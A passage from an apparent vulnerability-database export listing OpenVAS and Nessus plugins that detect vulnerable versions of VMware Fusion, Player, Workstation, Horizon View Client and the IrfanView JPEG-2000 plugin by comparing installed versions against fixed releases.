script_oid(\"1.3.6.1.4.1.25623.1.0.810682\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-07 18:39:57 +0530 (Fri, 07 Apr 2017)\");\n script_name(\"VMware Fusion 'RPC Command' Denial of Service Vulnerability (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Fusion\n and is prone to denial-of-service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation\n issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"VMware Fusion 6.x before 6.0.6 and 7.x\n before 7.0.1 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Fusion version 6.0.6\n or 7.0.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vmware_fusion_detect_macosx.nasl\");\n script_mandatory_keys(\"VMware/Fusion/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^6\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"6.0.6\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"6.0.6\");\n security_message(data:report);\n exit(0);\n }\n}\n\nelse if(vmwareVer =~ \"^7\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"7.0.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"7.0.1\");\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "description": "The host is installed with VMware Player\n and is prone to denial-of-service vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2017-04-07T00:00:00", "id": "OPENVAS:1361412562310810679", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810679", "type": "openvas", "title": "VMware Player 'RPC Command' Denial of Service Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_player_rpc_dos_vuln_win.nasl 11888 2018-10-12 15:27:49Z cfischer $\n#\n# VMware Player 'RPC Command' Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810679\");\n script_version(\"$Revision: 11888 $\");\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 17:27:49 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-07 17:39:57 +0530 (Fri, 07 Apr 2017)\");\n script_name(\"VMware Player 'RPC Command' Denial of Service Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Player\n and is prone to denial-of-service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation\n issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"VMware Player 6.x before 6.0.6\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Player version\n 6.0.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Player/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^6\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"6.0.6\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"6.0.6\");\n security_message(data:report );\n exit(0);\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "description": "The host is installed with VMware Player\n and is prone to denial-of-service vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2017-04-07T00:00:00", "id": "OPENVAS:1361412562310810680", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810680", "type": "openvas", "title": "VMware Player 'RPC Command' Denial of Service Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_player_rpc_dos_vuln_lin.nasl 11977 2018-10-19 07:28:56Z mmartin $\n#\n# VMware Player 'RPC Command' Denial of Service Vulnerability (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810680\");\n script_version(\"$Revision: 11977 $\");\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 09:28:56 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-07 17:46:25 +0530 (Fri, 07 Apr 2017)\");\n script_name(\"VMware Player 'RPC Command' Denial of Service Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Player\n and is prone to denial-of-service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an input validation\n issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"VMware Player 6.x before 6.0.6\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Player version\n 6.0.6 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Player/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^6\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"6.0.6\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"6.0.6\");\n security_message(data:report );\n exit(0);\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-07-02T21:10:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0897"], "description": "This host has IrfanView with JPEG-2000 plugin installed and is\n prone to stack based buffer overflow vulnerability.", "modified": "2017-04-12T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:802576", "href": "http://plugins.openvas.org/nasl.php?oid=802576", "type": "openvas", "title": "IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_irfanview_jpeg2000_bof_vuln.nasl 5940 2017-04-12 09:02:05Z teissa $\n#\n# IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code.\n Impact Level: Application\";\ntag_affected = \"IrfanView JPEG-2000 Plugin version prior to 4.33\";\ntag_insight = \"The flaw is due to an error in the JPEG2000 plug-in when processing\n the Quantization Default (QCD) marker segment. This can be exploited to cause\n a stack-based buffer overflow via a specially crafted JPEG2000 (JP2) file.\";\ntag_solution = \"Upgrade IrfanView JPEG-2000 Plugin version to 4.33 or later\n For updates refer to http://www.irfanview.com/plugins.htm\";\ntag_summary = \"This host has IrfanView with JPEG-2000 plugin installed and is\n prone to stack based buffer overflow vulnerability.\";\n\nif(description)\n{\n script_id(802576);\n script_version(\"$Revision: 5940 $\");\n script_cve_id(\"CVE-2012-0897\");\n script_bugtraq_id(51426);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-12 11:02:05 +0200 (Wed, 12 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 11:28:20 +0530 (Wed, 01 Feb 2012)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/47360\");\n script_xref(name : \"URL\" , value : \"http://www.irfanview.com/plugins.htm\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/72398\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_irfanview_detect.nasl\");\n script_require_keys(\"IrfanView/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variable initialization\npath = \"\";\nplgVer = \"\";\nirViewVer = NULL;\n\nirViewVer = get_kb_item(\"IrfanView/Ver\");\nif(isnull(irViewVer)){\n exit(0);\n}\n\n# Get IrfanView JPEG-2000 Plugin installed path\npath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IrfanView\",\n item:\"UninstallString\");\nif(path != NULL)\n{\n irViewPath = path - \"\\iv_uninstall.exe\" + \"\\Plugins\\JPEG2000.dll\";\n plgVer = GetVersionFromFile(file:irViewPath, verstr:\"prod\");\n if(!plgVer){\n exit(0);\n }\n\n ## Check IrfanView JPEG-2000 Plugin version < 4.33\n if(version_is_less(version:plgVer, test_version:\"4.33\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-26T15:08:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0897"], "description": "This host has IrfanView with JPEG-2000 plugin installed and is\n prone to stack based buffer overflow vulnerability.", "modified": "2020-04-22T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:1361412562310802576", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802576", "type": "openvas", "title": "IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802576\");\n script_version(\"2020-04-22T10:27:30+0000\");\n script_cve_id(\"CVE-2012-0897\");\n script_bugtraq_id(51426);\n script_tag(name:\"last_modification\", value:\"2020-04-22 10:27:30 +0000 (Wed, 22 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 11:28:20 +0530 (Wed, 01 Feb 2012)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"IrfanView JPEG-2000 Plugin Remote Stack Based Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47360\");\n script_xref(name:\"URL\", value:\"http://www.irfanview.com/plugins.htm\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/72398\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_irfanview_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"IrfanView/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"IrfanView JPEG-2000 Plugin version prior to 4.33\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error in the JPEG2000 plug-in when processing\n the Quantization Default (QCD) marker segment. This can be exploited to cause\n a stack-based buffer overflow via a specially crafted JPEG2000 (JP2) file.\");\n script_tag(name:\"solution\", value:\"Upgrade IrfanView JPEG-2000 Plugin version to 4.33 or later.\");\n script_tag(name:\"summary\", value:\"This host has IrfanView with JPEG-2000 plugin installed and is\n prone to stack based buffer overflow vulnerability.\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nirViewVer = get_kb_item(\"IrfanView/Ver\");\nif(isnull(irViewVer)){\n exit(0);\n}\n\npath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\IrfanView\",\n item:\"UninstallString\");\nif(path != NULL)\n{\n irViewPath = path - \"\\iv_uninstall.exe\" + \"\\Plugins\\JPEG2000.dll\";\n plgVer = GetVersionFromFile(file:irViewPath, verstr:\"prod\");\n if(!plgVer){\n exit(0);\n }\n\n if(version_is_less(version:plgVer, test_version:\"4.33\")){\n report = report_fixed_ver(installed_version:plgVer, fixed_version:\"4.33\", install_path:irViewPath);\n security_message(port:0, data:report);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341", "CVE-2015-1044", "CVE-2014-8370", "CVE-2015-1043"], "description": "The host is installed with\n VMware Workstation and is prone to multiple vulnerabilities.", "modified": "2018-10-24T00:00:00", "published": "2016-05-20T00:00:00", "id": "OPENVAS:1361412562310806759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806759", "type": "openvas", "title": "VMware Workstation Multiple Vulnerabilities May16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_mult_dos_vuln_may16_win.nasl 12051 2018-10-24 09:14:54Z asteins $\n#\n# VMware Workstation Multiple Vulnerabilities May16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806759\");\n script_version(\"$Revision: 12051 $\");\n script_cve_id(\"CVE-2014-8370\", \"CVE-2015-1043\", \"CVE-2015-1044\", \"CVE-2015-2341\");\n script_bugtraq_id(72338, 72337, 72336, 75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-24 11:14:54 +0200 (Wed, 24 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-20 09:35:33 +0530 (Fri, 20 May 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"VMware Workstation Multiple Vulnerabilities May16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Workstation and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - An arbitrary file write issue.\n\n - An input validation issue in the Host Guest File System (HGFS).\n\n - An input validation issue in VMware Authorization process (vmware-authd).\n\n - An input validation issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n attacker for for privilege escalation and to cause Denial of Service.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation 10.x prior to version\n 10.0.5 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation version\n 10.0.5 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^10\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"10.0.5\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"10.0.5\");\n security_message(data:report );\n exit(0);\n }\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-07-17T14:26:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341", "CVE-2015-1044", "CVE-2014-8370", "CVE-2015-1043"], "description": "The host is installed with\n VMware Workstation and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2016-05-20T00:00:00", "id": "OPENVAS:1361412562310806760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806760", "type": "openvas", "title": "VMware Workstation Multiple Vulnerabilities May16 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMware Workstation Multiple Vulnerabilities May16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806760\");\n script_version(\"2019-07-05T09:29:25+0000\");\n script_cve_id(\"CVE-2014-8370\", \"CVE-2015-1043\", \"CVE-2015-1044\", \"CVE-2015-2341\");\n script_bugtraq_id(72338, 72337, 72336, 75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:29:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-20 09:35:33 +0530 (Fri, 20 May 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"VMware Workstation Multiple Vulnerabilities May16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Workstation and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - An arbitrary file write issue.\n\n - An input validation issue in the Host Guest File System (HGFS).\n\n - An input validation issue in VMware Authorization process (vmware-authd).\n\n - An input validation issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n attacker for for privilege escalation and to cause Denial of Service.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation 10.x prior to version\n 10.0.5 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation version\n 10.0.5 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^10\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"10.0.5\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"10.0.5\");\n security_message(data:report );\n exit(0);\n }\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-01T07:00:02", "description": "The version of VMware Horizon View Client installed on the remote host\nis 3.2.x prior to 3.2.1, 3.3.x prior to 3.4.0, or 5.x (with local\nmode) prior to 5.4.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple denial of service vulnerabilities exist due to\n improper memory allocation by the TPView.dll and\n TPInt.dll libraries. A remote attacker can exploit this\n to cause a denial of service condition. (CVE-2015-2338,\n CVE-2015-2339, CVE-2015-2340)\n\n - Multiple remote code execution vulnerabilities exist due\n to improper memory allocation by the TPView.dll and\n TPInt.dll libraries. A remote attacker can exploit this\n to execute arbitrary code. (CVE-2015-2336,\n CVE-2015-2337)", "edition": 28, "published": "2015-06-12T00:00:00", "title": "VMware Horizon View Client 3.2.x < 3.2.1 / 3.3.x < 3.4.0 / or 5.x < 5.4.2 Multiple Vulnerabilities (VMSA-2015-0004)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:horizon_view_client"], "id": "VMWARE_HORIZON_VIEW_CLIENT_VMSA_2015_0004.NASL", "href": "https://www.tenable.com/plugins/nessus/84150", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84150);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2012-0897\",\n \"CVE-2015-2336\",\n \"CVE-2015-2337\",\n \"CVE-2015-2338\",\n \"CVE-2015-2339\",\n \"CVE-2015-2340\"\n );\n script_bugtraq_id(51426, 75092, 75095);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Horizon View Client 3.2.x < 3.2.1 / 3.3.x < 3.4.0 / or 5.x < 5.4.2 Multiple Vulnerabilities (VMSA-2015-0004)\");\n script_summary(english:\"Checks the VMware Horizon View Client version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtual desktop solution installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Horizon View Client installed on the remote host\nis 3.2.x prior to 3.2.1, 3.3.x prior to 3.4.0, or 5.x (with local\nmode) prior to 5.4.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple denial of service vulnerabilities exist due to\n improper memory allocation by the TPView.dll and\n TPInt.dll libraries. A remote attacker can exploit this\n to cause a denial of service condition. (CVE-2015-2338,\n CVE-2015-2339, CVE-2015-2340)\n\n - Multiple remote code execution 